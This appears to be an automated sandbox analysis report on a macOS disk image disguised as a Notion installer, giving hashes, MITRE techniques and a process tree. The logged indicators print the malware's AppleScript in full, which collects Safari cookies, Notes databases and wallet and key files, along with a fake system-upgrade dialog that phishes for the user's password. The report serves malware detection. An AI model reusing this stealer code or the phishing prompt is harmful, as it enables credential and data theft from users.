fc0ea6a7080a3432252e7f6b1e18b4782607c5d72605b283fb0bdb496c74f9a6

Resubmissions

25/03/2024, 01:45

240325-b6r1msfe7s 1

28/02/2024, 06:38

240228-hd8w1sde3s 8

Analysis

max time kernel
153s
max time network
201s
platform
macos-10.15_amd64
resource
macos-20240214-en
resource tags

arch:amd64arch:i386image:macos-20240214-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
28/02/2024, 06:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Notion-3-2-0-universal.dmg
Size

652KB
MD5

071e5cd77454e1bada55aa31e1dd0eb6
SHA1

a2a0ff830628734709d7c87debe3e81573f0f0b6
SHA256

fc0ea6a7080a3432252e7f6b1e18b4782607c5d72605b283fb0bdb496c74f9a6
SHA512

c909f07b252799042bbcbddfdf6453d5c1dc5427191baed2d8fc25eac5ec47d19ab4fee80a08c65789500802a885261eb77f193080e9ea3695d78b8cb32f2a89
SSDEEP

12288:n5GUuR72t6Igl2O2Gqapl6XICvGgnyJtsTfxf8U1C/hmRggQey4:nuxz1jTqA6nv1nyJtsTfxkU1C50Qe

Score

8^/10

evasion execution

Malware Config

Signatures

Identifies hardware specifics through system_profiler 2 IoCs

ioc	Process
system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType	Process not Found
bash -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"	Process not Found

AppleScript 1 TTPs 4 IoCs

execution

AppleScript

T1059.002

ioc	Process
osascript -e "set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\", \"rtf\", \"key\", \"keys\", \"png\", \"jpg\", \"jpeg\", \"wallet\", \"doc\", \"docx\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) < 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) < 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell"	Process not Found
sh -c "osascript -e 'tell application \"Terminal\" to close first window'& exit"	Process not Found
osascript -e "tell application \"Terminal\" to close first window"	Process not Found
osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\""	Process not Found

Resource Forking 1 TTPs 5 IoCs

evasion

Resource Forking

T1564.009

ioc	Process
"/usr/local/Cellar/[email protected]/3.9.7_1/Frameworks/Python.framework/Versions/3.9/Resources/Python.app/Contents/MacOS/Python" /var/tmp/olx	Process not Found
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper	Process not Found
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper	Process not Found
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper	Process not Found
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper	Process not Found

/bin/sh
sh -c "sudo /bin/zsh -c \"open /Volumes/Notion-3-2-0-universal\""
1⤵
PID:592

/bin/bash
sh -c "sudo /bin/zsh -c \"open /Volumes/Notion-3-2-0-universal\""
1⤵
PID:592

/usr/bin/sudo
sudo /bin/zsh -c "open /Volumes/Notion-3-2-0-universal"
1⤵
PID:592
- /bin/zsh
  /bin/zsh -c "open /Volumes/Notion-3-2-0-universal"
  2⤵
  PID:593
- /usr/bin/open
  open /Volumes/Notion-3-2-0-universal
  2⤵
  PID:593

/usr/libexec/xpcproxy
xpcproxy com.apple.quicklook.ui.helper
1⤵
PID:601

/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
1⤵
PID:601

/usr/libexec/xpcproxy
xpcproxy com.apple.TextInputMenuAgent
1⤵
PID:602

/usr/libexec/xpcproxy
xpcproxy com.apple.metadata.mdwrite
1⤵
PID:603

/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
1⤵
PID:602

/usr/bin/login
login -pf run
1⤵
PID:604
- /bin/zsh
  -zsh
  2⤵
  PID:606
- - /usr/libexec/path_helper
    /usr/libexec/path_helper -s
    3⤵
    PID:608
- - /usr/bin/locale
    locale LC_CTYPE
    3⤵
    PID:609
- - /Volumes/Notion-3-2-0-universal/Notion-3-2-0-universal
    /Volumes/Notion-3-2-0-universal/Notion-3-2-0-universal
    3⤵
    PID:610

/usr/libexec/xpcproxy
xpcproxy com.apple.AccountPolicyHelper
1⤵
PID:605

/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
1⤵
PID:605

/usr/libexec/xpcproxy
xpcproxy com.apple.TextInputSwitcher
1⤵
PID:607

/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher
/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher
1⤵
PID:607

/bin/sh
sh -c "osascript -e 'tell application \"Terminal\" to close first window'& exit"
1⤵
PID:612

/bin/bash
sh -c "osascript -e 'tell application \"Terminal\" to close first window'& exit"
1⤵
PID:612
- /usr/bin/osascript
  osascript -e "tell application \"Terminal\" to close first window"
  2⤵
  PID:613

/bin/sh
sh -c "python3 /var/tmp/olx"
1⤵
PID:614

/bin/bash
sh -c "python3 /var/tmp/olx"
1⤵
PID:614

/usr/local/bin/python3
python3 /var/tmp/olx
1⤵
PID:614

/usr/local/Cellar/[email protected]/3.9.7_1/Frameworks/Python.framework/Versions/3.9/Resources/Python.app/Contents/MacOS/Python
"/usr/local/Cellar/[email protected]/3.9.7_1/Frameworks/Python.framework/Versions/3.9/Resources/Python.app/Contents/MacOS/Python" /var/tmp/olx
1⤵
PID:614
- /usr/local/bin/osascript
  osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\""
  2⤵
  PID:615
- /usr/bin/osascript
  osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\""
  2⤵
  PID:615
- /usr/local/bin/dscl
  dscl . authonly run root
  2⤵
  PID:622
- /usr/bin/dscl
  dscl . authonly run root
  2⤵
  PID:622
- /usr/local/bin/osascript
  osascript -e "set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\", \"rtf\", \"key\", \"keys\", \"png\", \"jpg\", \"jpeg\", \"wallet\", \"doc\", \"docx\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) < 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) < 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell"
  2⤵
  PID:623
- /usr/bin/osascript
  osascript -e "set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\", \"rtf\", \"key\", \"keys\", \"png\", \"jpg\", \"jpeg\", \"wallet\", \"doc\", \"docx\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) < 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) < 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell"
  2⤵
  PID:623
- /usr/local/bin/bash
  bash -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"
  2⤵
  PID:631
- /usr/bin/bash
  bash -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"
  2⤵
  PID:631
- /bin/bash
  bash -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"
  2⤵
  PID:631
- /usr/sbin/system_profiler
  system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
  2⤵
  PID:631

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:619

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:619

/usr/libexec/xpcproxy
xpcproxy com.apple.bird
1⤵
PID:626

/System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
/System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
1⤵
PID:626

/usr/libexec/xpcproxy
xpcproxy com.apple.sandboxd
1⤵
PID:627

/usr/libexec/sandboxd
/usr/libexec/sandboxd
1⤵
PID:627

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.E9AAD7FA-A690-4520-9ABE-400378FE0533
1⤵
PID:628

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:628

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.8297A8E6-902D-4266-869C-FBEC3FCCE720
1⤵
PID:629

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:629

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.E554C36D-E480-4820-973B-E36CFB150227
1⤵
PID:630

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:630

/usr/bin/csrutil
/usr/bin/csrutil status
1⤵
PID:633

/usr/libexec/xpcproxy
xpcproxy com.apple.icloud.findmydeviced
1⤵
PID:635

/usr/libexec/findmydeviced
/usr/libexec/findmydeviced
1⤵
PID:635

/bin/sh
sh -c /var/tmp/olx
1⤵
PID:637

/bin/bash
sh -c /var/tmp/olx
1⤵
PID:637

/var/tmp/olx
/var/tmp/olx
1⤵
PID:637

/bin/sh
sh -c "rm /var/tmp/olx"
1⤵
PID:639

/bin/bash
sh -c "rm /var/tmp/olx"
1⤵
PID:639

/bin/rm
rm /var/tmp/olx
1⤵
PID:639

/usr/libexec/xpcproxy
xpcproxy com.apple.tailspind
1⤵
PID:656

/usr/libexec/tailspind
/usr/libexec/tailspind
1⤵
PID:656

/usr/libexec/xpcproxy
xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E
1⤵
PID:659

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
1⤵
PID:659

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

AppleScript

T1059.002

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Resource Forking

T1564.009

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/tmp/olx

Filesize
11KB

MD5
e5744712d05c764987c7f129bab85ad1

SHA1
c9a8945f2bf92bb5fb0b9109ff92b728e7ae5bdc

SHA256
b5607c678a1f8ac738b195ce604f44cc0b50ca9c47ea57e44a271a94fb5a02d8

SHA512
50bacedceed554365f512695d065eb8d49b8a3d4a6291d12bd03a39aa32dd6ccf945d2c196e37f7f60da70f946bca1acd1babb2fd832c471269526269f8aa821

Download Submit